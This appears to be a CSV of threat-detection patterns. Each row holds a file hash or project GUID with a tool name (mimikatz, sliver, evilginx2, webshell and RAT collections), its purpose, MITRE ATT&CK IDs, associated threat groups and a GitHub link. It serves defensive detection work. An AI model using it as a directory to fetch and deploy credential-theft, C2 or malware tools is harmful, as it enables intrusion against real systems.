"*53f349d9fefb61b435f3b257f63ec8720b92cc4446cc08455e53ba9c5ca8071c*",".{0,1000}53f349d9fefb61b435f3b257f63ec8720b92cc4446cc08455e53ba9c5ca8071c.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#filehash","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","26764"
"*53f520d2ad626e798afef1865d9e91aaaa6f98e6062423819f9222357d1bf676*",".{0,1000}53f520d2ad626e798afef1865d9e91aaaa6f98e6062423819f9222357d1bf676.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26766"
"*5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2*",".{0,1000}5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26767"
"*5406c993ef16ac875804185a8f37db5b2473def489a613de0b667f304b498c97*",".{0,1000}5406c993ef16ac875804185a8f37db5b2473def489a613de0b667f304b498c97.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","26769"
"*540967d13db656212627d62d92f1ea985fc668cd5ee0aff670d2ecca51f6d302*",".{0,1000}540967d13db656212627d62d92f1ea985fc668cd5ee0aff670d2ecca51f6d302.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26771"
"*54127199e63da3f970416117b90980efe214cf9d313a38129cf9c09ceb1b6c7f*",".{0,1000}54127199e63da3f970416117b90980efe214cf9d313a38129cf9c09ceb1b6c7f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26772"
"*54138c7dfb078ce768fe9893ea069bbedbf249a10add1e3a772aaa14497ac863*",".{0,1000}54138c7dfb078ce768fe9893ea069bbedbf249a10add1e3a772aaa14497ac863.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26773"
"*541408686147c9ba7d59b1b4430addb3aabcf0033353ed1140d182243012b934*",".{0,1000}541408686147c9ba7d59b1b4430addb3aabcf0033353ed1140d182243012b934.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","26774"
"*541d58d2674466283a1d43faf0b7a0dba0cc29e67f2112bde3ac3d9384531446*",".{0,1000}541d58d2674466283a1d43faf0b7a0dba0cc29e67f2112bde3ac3d9384531446.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26775"
"*542742cf1661a2e40473ffd6e8f3a4a1035a6ad31cd5ac6ca90965ef03646f27*",".{0,1000}542742cf1661a2e40473ffd6e8f3a4a1035a6ad31cd5ac6ca90965ef03646f27.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26776"
"*542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c*",".{0,1000}542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26777"
"*542c779d785acb08e773a28f3de3c51c64ebbb2bbea0bd3ff70dc87f830add68*",".{0,1000}542c779d785acb08e773a28f3de3c51c64ebbb2bbea0bd3ff70dc87f830add68.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26778"
"*543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609*",".{0,1000}543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#filehash","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","26780"
"*54398cb2ba983d091f03ee04da0fd726b0f093d561808d336cf6087bd42f1f16*",".{0,1000}54398cb2ba983d091f03ee04da0fd726b0f093d561808d336cf6087bd42f1f16.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","26782"
"*54398ce81884b96d375b383c19b990208a38ca7a4d0fd05716a33c18713f4c29*",".{0,1000}54398ce81884b96d375b383c19b990208a38ca7a4d0fd05716a33c18713f4c29.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26783"
"*5439CECD-3BB3-4807-B33F-E4C299B71CA2*",".{0,1000}5439CECD\-3BB3\-4807\-B33F\-E4C299B71CA2.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","#GUIDproject","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","26784"
"*543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8*",".{0,1000}543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26785"
"*544207337c0553feb47498ed24a367c427dcb5feb49f0e3eee4913d235610262*",".{0,1000}544207337c0553feb47498ed24a367c427dcb5feb49f0e3eee4913d235610262.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26786"
"*5443182b6f9eabeb908b426fa819ca96bb270a34c5efc385dadc5a710532c3be*",".{0,1000}5443182b6f9eabeb908b426fa819ca96bb270a34c5efc385dadc5a710532c3be.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26787"
"*545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773*",".{0,1000}545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26790"
"*54584005fc341d7306b10709e9daf7ab60fcb9c782b7c81aa59c667d41d065bc*",".{0,1000}54584005fc341d7306b10709e9daf7ab60fcb9c782b7c81aa59c667d41d065bc.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","26791"
"*5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8*",".{0,1000}5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26792"
"*54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56*",".{0,1000}54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26794"
"*546c0fbbb9b7fbecd588e977612bec1b6bb1b3733c5e942e505a1b2b8de8697b*",".{0,1000}546c0fbbb9b7fbecd588e977612bec1b6bb1b3733c5e942e505a1b2b8de8697b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26797"
"*5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71*",".{0,1000}5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26803"
"*5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71*",".{0,1000}5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26804"
"*5475aec3b9837b514367c89d8362a9d524bfa02e75b85b401025588839a40bcb*",".{0,1000}5475aec3b9837b514367c89d8362a9d524bfa02e75b85b401025588839a40bcb.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","26805"
"*5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7*",".{0,1000}5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26806"
"*54783@thesecure.biz*",".{0,1000}54783\@thesecure\.biz.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","26807"
"*547b97d9bb9bfc6250599e19357911ab5ae3dde3ca5f0d49bea0e66e46799dfc*",".{0,1000}547b97d9bb9bfc6250599e19357911ab5ae3dde3ca5f0d49bea0e66e46799dfc.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","26808"
"*54819445d5ceb3c582f48b574190d1b357dad08a1708595fafe3db30323c890c*",".{0,1000}54819445d5ceb3c582f48b574190d1b357dad08a1708595fafe3db30323c890c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26809"
"*5494EDD3-132D-4238-AC25-FA384D78D4E3*",".{0,1000}5494EDD3\-132D\-4238\-AC25\-FA384D78D4E3.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","26811"
"*5499BC48B9E9289A19E8215F3EE3A7003DC2057D13970BFFFC42231A93E690A9*",".{0,1000}5499BC48B9E9289A19E8215F3EE3A7003DC2057D13970BFFFC42231A93E690A9.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26812"
"*549d16929c8125b4b04694fe39b663c8c4953d2905d188dca2e456cc595d5ce7*",".{0,1000}549d16929c8125b4b04694fe39b663c8c4953d2905d188dca2e456cc595d5ce7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26813"
"*549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9*",".{0,1000}549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26814"
"*54a2a04e9a0ac34095592b4475306313c5a8026c862e442d073d63bf192893f2*",".{0,1000}54a2a04e9a0ac34095592b4475306313c5a8026c862e442d073d63bf192893f2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26815"
"*54a43829632b2b9984076cb2e24c2d4cbd5e50c410eb4320591e3fc347dec662*",".{0,1000}54a43829632b2b9984076cb2e24c2d4cbd5e50c410eb4320591e3fc347dec662.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","26816"
"*54b105567f0d98e09c13109f6fc147c79109d413ec542a02a7f20a73a28b1840*",".{0,1000}54b105567f0d98e09c13109f6fc147c79109d413ec542a02a7f20a73a28b1840.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26817"
"*54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45*",".{0,1000}54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26818"
"*54b65d41295622a4039388c986b9df46b81960d797db9b436179c6b3d1a6b82f*",".{0,1000}54b65d41295622a4039388c986b9df46b81960d797db9b436179c6b3d1a6b82f.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","26820"
"*54b66544d277b262ca2fe38f66c21a3eda9e114e44b809b7e45c7c80c502f5dc*",".{0,1000}54b66544d277b262ca2fe38f66c21a3eda9e114e44b809b7e45c7c80c502f5dc.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26821"
"*54be339f0e1263b36efc2eae53780ea14e098f94fb2fbe0f6df4f7b2dafb8ce9*",".{0,1000}54be339f0e1263b36efc2eae53780ea14e098f94fb2fbe0f6df4f7b2dafb8ce9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","26824"
"*54bf6a4dd21e76db385e1a4dd952e74d28711a8fefdf802c4da52e4740a93116*",".{0,1000}54bf6a4dd21e76db385e1a4dd952e74d28711a8fefdf802c4da52e4740a93116.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26825"
